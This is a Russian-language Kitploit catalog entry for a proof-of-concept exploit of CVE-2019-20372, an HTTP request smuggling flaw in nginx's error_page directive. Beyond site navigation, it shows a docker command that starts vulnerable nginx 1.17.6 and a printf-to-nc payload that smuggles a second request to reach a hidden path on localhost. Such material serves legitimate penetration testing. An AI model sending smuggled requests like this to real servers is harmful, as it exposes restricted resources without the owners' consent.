Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-20372 — Эксплойт доказательства концепции для CVE-2019-20372: HTTP-контрабанда запросов через директиву error_page nginx, обеспечивающая доступ к скрытым ресурсам. | Kitploit
Инструменты/GitHubGitHub/vuongnv3389-sec/cve-2019-20372
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubvuongnv3389-sec/cve-2019-20372

CVE-2019-20372

Эксплойт доказательства концепции для CVE-2019-20372: HTTP-контрабанда запросов через директиву error_page nginx, обеспечивающая доступ к скрытым ресурсам.

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
4 лет назадЕщё не проверено

ССЫЛКА

https://bertjwregeer.keybase.pub/2019-12-10%20-%20error_page%20request%20smuggling.pdf

Запуск сервера

docker run -it --rm -p 80:80 -v pwd/default.conf:/etc/nginx/conf.d/default.conf nginx:1.17.6

Эксплуатация

printf "GET /a HTTP/1.1\r\nHost: localhost\r\nContent-Length: 56\r\n\r\nGET /_hidden/index.html HTTP/1.1\r\nHost: notlocalhost\r\n\r\n" | nc localhost 80

Скачать инструмент